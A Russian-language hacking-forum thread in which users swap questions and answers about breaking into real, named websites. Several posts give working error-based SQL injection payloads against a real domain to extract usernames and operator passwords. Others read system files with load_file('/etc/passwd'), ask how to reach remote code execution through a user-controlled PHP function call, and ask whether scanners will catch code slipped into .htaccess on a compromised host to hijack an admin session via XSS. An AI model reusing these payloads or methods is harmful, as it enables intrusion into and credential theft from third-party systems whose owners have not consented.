Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    129
    Likes Received:
    5
    Reputations:
    1

    версия 5.5.4 www.werbevirus.de/img/media.php?art=bannerklick
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    Code:
    http://werbevirus.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,(SELECT nickname FROM netzwerk_user LIMIT 0,1))))
    а те колонки из вашего запроса - пустые.
     
    _________________________
  3. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    129
    Likes Received:
    5
    Reputations:
    1
    спасибо

    я маленько не так сделала
    1 |(ExtractValue(1,concat(0x5c,(SELECT GROUP_CONCAT(CONCAT_WS(0x3a,betreiber_id,betreiber_passwort,betreiber_kennung)) FROM netzwerk_schnittstelle ))))

    пустые но не все))
     
  4. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----
     
  5. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25

    select load_file('/etc/passwd')
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    даже если так, то можно узнать папки из /home/, однако из /home/user/ или /home/user/***/www/--- нет. другие варианты: брутфорс, раскрытие путей
    или как вариант, если тебе нужен список сайтов под определенным юзером ищи конфиг апача :)
     
    _________________________
    #23786 yarbabin, 20 Jan 2015
    Last edited: 20 Jan 2015
  7. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    373
    Likes Received:
    164
    Reputations:
    126
    Если freebsd, то через пма можно узнать.
    select load_file('home/user/') покажет все папки в папке user и т.д.
     
    _________________________
    2 people like this.
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    error based в limit
    Code:
    num=50,25+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+extractvalue(1,concat(0x3A,version()))))--+
    5.5.32
     
    _________________________
    #23788 yarbabin, 23 Jan 2015
    Last edited: 23 Jan 2015
    4 people like this.
  9. scr1m77

    scr1m77 Member

    Joined:
    29 Dec 2010
    Messages:
    2
    Likes Received:
    6
    Reputations:
    2
    есть уязвимый кусок кода:
    PHP:
    $function($param1$param2);
    могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:
    Code:
    Fatal error: Call to undefined function phpinfo();exit()
    Есть какой-нибудь вариант внедрения произвольного кода?
     
  10. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    нормально напишите сударь что за функция?
     
  11. scr1m77

    scr1m77 Member

    Joined:
    29 Dec 2010
    Messages:
    2
    Likes Received:
    6
    Reputations:
    2
    вроде предельно ясно написано, могу передавать произвольное значение. Например:
    PHP:
    $function $_REQUEST['action'];
    $function($param1$param2); 
     
  12. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Если не контролируются параметры (хотя бы один), то вряд ли получится RCE.
     
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,280
    Likes Received:
    429
    Reputations:
    234
    http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bview%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpicalendar&tx_cal_controller%5Buid%5D=357&tx_cal_controller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_controller%5Bday%5D=04
    Можно чё нить с этим сделать?
    Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
     
  14. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Есть активная XSS на одном сайте и я хочу получить от него админку, но фишка вся с хостом. Под хостом имеется ввиду мой шелл на котором уже есть свой файл .htaccess в который нам нужно вставить свой код. .. Так вот вопрос, если я дополнительно вставлю свой код, на работе самого сайта это никак не отразится... сканеры могут обнаружить этот код?!
     
  15. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.

    Конечно могут.
     
  16. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,280
    Likes Received:
    429
    Reputations:
    234
    Это очевидно, что ведёт лог, по всем признакам похоже на иньекцию error base и я уверен что это SQLi! только вот у самого не получилось запрос составить, думал может кому то повезёт...
     
    #23796 DezMond™, 27 Jan 2015
    Last edited: 27 Jan 2015
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    вы ошибаетесь. ошибка возникает при добавлении в лог. даже если так, то mq = on, а передаваемый URL — str
     
    _________________________
  18. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    Да, можно наблюдать, что параметр достаточно экранируется. Ещё можно заметить, что используется драйвер MySQL Improved, а значит, что наиболее вероятно в запрос ни один из параметров непосредственно не попадает. Пациент мертв дважды.
     
  19. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://infe{GOOGLE INDEX}vents.com/Lightbox{GOOGLE INDEX}Detail.aspx?boxid=229883%27&start=17
    ничего не даёт, кроме раскрытия путей, верно?
     
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,664
    Likes Received:
    913
    Reputations:
    363
    ну и раскрытие информации о сервере
     
    _________________________
Loading...
Thread Status:
Not open for further replies.